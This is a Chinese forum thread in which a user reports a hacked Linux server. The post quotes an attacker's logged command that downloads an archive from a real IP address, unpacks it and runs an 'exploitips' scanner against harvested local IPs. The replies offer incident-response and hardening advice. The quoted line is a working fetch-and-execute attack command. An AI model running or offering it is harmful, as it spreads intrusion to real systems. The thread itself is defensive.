自己的 Linux 服务器应该被攻击了,看日志查看到以下的执行命令
curl -O 167.235.199.99/.mini/.msq.tar; tar xvf .msq.tar; rm -rf .msq.tar ; cd .msq; chmod +x *; ip addr > .ipss ; grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .ipss > .regexout; ./exploitips 自己的显卡暂时还没有被征用
有大佬知道167.235.199.99/.mini/.msq.tar压缩包内可执行程序会干什么事情吗?(在虚拟机下尝试)
个人水平差,望赐教! 以及接下来该怎么做呢?重新安装系统?
 | 1 sheeta Apr 27, 2023  1 重装最好 |
 | 2 MoeMoesakura Apr 27, 2023 1 1.去丢在线沙盒里跑 2.建议重装,但是记得先看 last 跟 lastb ,记录一下 IP |
 | 3 JoshuaBen Apr 27, 2023 1 看起来是在横向移动扩散,找内网的其他资产 |
 | 4 CodeCodeStudy Apr 27, 2023 1 好像是尝试用弱口令扫码局域网 IP |
 | 5 bjzhush Apr 27, 2023 1  解压之后看到有这几个文件,基本上就是扫描、提权、大马这一类的,先把你重要数据备份到本地或者别的服务器吧 |
 | 6 Calen Apr 27, 2023 via iPhone 1 方便问一下您的服务器密码是什么吗?类似的例子就行。 |
 | 7 fantasticlw OP @Calen 因为要给朋友用,所以他们的就和用户名一致疏忽了 |
 | 8 1KTN90lKW9gVJ9vX Apr 27, 2023 via Android 1 关机,睡觉。 |
 | 9 namelesswryyy Apr 28, 2023 via Android 1 找运行中的程序位置,有没有奇怪的 path 有专门做 process 名伪装的,能伪装名字但位置能看到 找 crontab 有没有奇怪的定时任务 封掉漏洞后,处理完再观察一段时间 如果还有,可能就是系统文件被替换了 建议把东西移走,重做 但这种情况不太多 |
 | 10 JensenQian Apr 28, 2023 via Android 1 密钥登录,别用密码 |
 | 11 feng0vx Apr 28, 2023 via iPhone 1 重装,换密钥登陆,禁用 root 登陆,密码 uuid 生成 |
 | 12 dode Apr 28, 2023 1 |
| 13 dode Apr 28, 2023 备份数据,重装系统,禁用 ssh 密码登陆 |
 | 14 xiaoqiao24 Apr 28, 2023 @dode 是不是可以添加大写呢 或者加个开关支持大写? |
 | 15 documentzhangx66 Apr 28, 2023 楼主思路完全搞错了。 1.重装。 2.没必要禁用 root ,也没必要换秘钥登录。root 使用至少 16 位复杂密码,包含数字、字符、大小写字母。 3.安装 fail2ban 。 4.常见服务,比如 nginx 、mysql ,不要直接暴露端口到公网,要过一遍防火墙与 WAF 。 5.如果没有防火墙与 WAF ,那就用 WireGuard 给服务器组加密虚拟网络,需要使用服务器的电脑,在 WireGuard 网络里访问服务器。 6.服务器 SSH 端口,要做白名单,仅允许认识的 IP 地址连接。 |
 | 16 dogking2 Apr 28, 2023 1 |
 | 17 salmon5 Apr 28, 2023 root+至少 20 位的 大小写+数字 随机密码,能避免 99.99%的攻击 |
| 18 dode Apr 28, 2023 @xiaoqiao24 这是我自用的,代码也很简单,一个 html 文件,你可以存一个自己改,一般要求大写的服务就换一下首个字母,现在浏览器也支持自动生成密码. |
Select Language